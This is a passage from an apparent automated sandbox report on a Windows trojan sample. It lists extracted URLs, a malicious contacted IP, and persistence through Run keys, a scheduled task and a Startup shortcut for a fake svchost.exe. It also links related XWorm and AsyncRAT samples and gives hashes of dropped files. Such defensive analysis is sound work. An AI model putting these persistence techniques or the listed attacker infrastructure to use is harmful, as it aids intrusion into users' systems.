                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1640787722.000001B280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ADC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1662916943.000001B29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1783062203.000002239646F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1953909365.000002B02AC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://ip-api.comsvchost.exe, 00000003.00000002.2787361809.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2787361809.0000000002DE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://discord.gg/sGNBaJSzYDALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drfalse
                                                          		high
                                                          http://crl.micft.cMicRosofpowershell.exe, 00000009.00000002.1798528406.000002239EB66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://aka.ms/pscore68powershell.exe, 00000006.00000002.1640787722.000001B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ABA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesvchost.exe, 00000003.00000002.2787361809.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2787361809.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1640787722.000001B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ABA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://github.com/itfoundry/Poppins)&&&&sALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  208.95.112.1
                                                                  		ip-api.comUnited States
                                                                  		53334TUT-ASUSfalse
                                                                  45.141.26.134
                                                                  		unknownNetherlands
                                                                  		62068SPECTRAIPSpectraIPBVNLtrue

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1583457
                                                                  Start date and time:2025-01-02 20:09:20 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 42s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:25
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:file.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@26/25@1/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 11.1%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 92
                                                                  • Number of non-executed functions: 4
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45, 173.222.162.55
                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target ALL slumzick.exe, PID 6120 because there are no executed function
                                                                  • Execution Graph export aborted for target All function.exe, PID 4400 because it is empty
                                                                  • Execution Graph export aborted for target file.exe, PID 4576 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 3444 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 6956 because it is empty
                                                                  • Execution Graph export aborted for target svchost.exe, PID 1196 because it is empty
                                                                  • Execution Graph export aborted for target svchost.exe, PID 6828 because it is empty
                                                                  • Execution Graph export aborted for target svchost.exe, PID 7008 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • VT rate limit hit for: file.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  14:10:51API Interceptor57x Sleep call for process: powershell.exe modified
                                                                  14:11:51API Interceptor101x Sleep call for process: svchost.exe modified
                                                                  20:11:52Task SchedulerRun new task: svchost path: C:\Users\user\AppData\Roaming\svchost.exe
                                                                  20:11:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                                                                  20:12:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                                                                  20:12:32AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  208.95.112.123khy505ab.exeGet hashmaliciousNjratBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  Java32.exeGet hashmaliciousXWormBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                  • ip-api.com/json/?fields=225545
                                                                  intro.avi.exeGet hashmaliciousQuasarBrowse
                                                                  • ip-api.com/json/
                                                                  AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                                  • ip-api.com/json/?fields=225545
                                                                  L988Ph5sKX.exeGet hashmaliciousXWormBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  kj93GnZHBS.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                                  • ip-api.com/line/?fields=hosting

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  ip-api.com23khy505ab.exeGet hashmaliciousNjratBrowse
                                                                  • 208.95.112.1
                                                                  XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 208.95.112.1
                                                                  Java32.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                  • 208.95.112.1
                                                                  intro.avi.exeGet hashmaliciousQuasarBrowse
                                                                  • 208.95.112.1
                                                                  AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                                  • 208.95.112.1
                                                                  L988Ph5sKX.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  kj93GnZHBS.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 208.95.112.1
                                                                  ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  SPECTRAIPSpectraIPBVNLXClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 45.141.26.234
                                                                  Java32.exeGet hashmaliciousXWormBrowse
                                                                  • 45.141.26.234
                                                                  nklmips.elfGet hashmaliciousUnknownBrowse
                                                                  • 89.190.159.77
                                                                  1.elfGet hashmaliciousUnknownBrowse
                                                                  • 45.141.239.79
                                                                  TRC.ppc.elfGet hashmaliciousMiraiBrowse
                                                                  • 45.144.191.245
                                                                  da6ke5KbfB.exeGet hashmaliciousAsyncRAT, Babadeda, XWormBrowse
                                                                  • 45.141.26.234
                                                                  03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 45.141.26.234
                                                                  saiya.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 45.141.26.134
                                                                  windxcmd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 45.141.26.134
                                                                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 45.138.53.54
                                                                  TUT-ASUS23khy505ab.exeGet hashmaliciousNjratBrowse
                                                                  • 208.95.112.1
                                                                  XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 208.95.112.1
                                                                  Java32.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                  • 208.95.112.1
                                                                  intro.avi.exeGet hashmaliciousQuasarBrowse
                                                                  • 208.95.112.1
                                                                  AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                                  • 208.95.112.1
                                                                  L988Ph5sKX.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  kj93GnZHBS.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 208.95.112.1
                                                                  ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\All function.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Roaming\All function.exe
                                                                  File Type:CSV text
                                                                  Category:dropped
                                                                  Size (bytes):654
                                                                  Entropy (8bit):5.380476433908377
                                                                  Encrypted:false
                                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:CSV text
                                                                  Category:dropped
                                                                  Size (bytes):654
                                                                  Entropy (8bit):5.380476433908377
                                                                  Encrypted:false
                                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                  Malicious:true
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  File Type:Unknown
                                                                  Category:dropped
                                                                  Size (bytes):654
                                                                  Entropy (8bit):5.380476433908377
                                                                  Encrypted:false
                                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):0.34726597513537405
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlll:Nll
                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                  Malicious:false
                                                                  Preview:@...e...........................................................

                                                                  C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):64
                                                                  Entropy (8bit):4.5201541487443
                                                                  Encrypted:false
                                                                  SSDEEP:3:rRSFgCXfMKt2cWRA4kvRovNsr4rNrn:EFfXfMm2RUZoWrcBn
                                                                  MD5:DDF180221099BE333DFC2D1663DA57F3
                                                                  SHA1:4E7DFBA06988D7DE02A9D9D1313C722E76F15706
                                                                  SHA-256:4CF62923639FDA31E8F1C5B04462D300C422156EB49AD7ECE009FD44D4DF3A2F
                                                                  SHA-512:61A3BFE21D6B56711CA2E08AF9DFC0FDB538AE3DB1651A1F9A6B76F8FCA83C2EC47B90F8B855262C21F922B40B89D11FE8A44F3A196E3898A4D8CF62BED89C81
                                                                  Malicious:false
                                                                  Preview:....### ALL slumzick.exe - System Error ###..[WIN]r[WIN]r[WIN]r

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2w3gcfkz.azr.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ovrfyki.dzq.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ddpwahu.nf2.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4v4fwn2r.pxc.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_amx2unem.0cd.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_che1wgal.gj4.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkisaoa0.ri4.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e21wltsa.mph.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ew0ul33q.0s4.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhtea1ej.vju.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_foe5dcum.llz.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
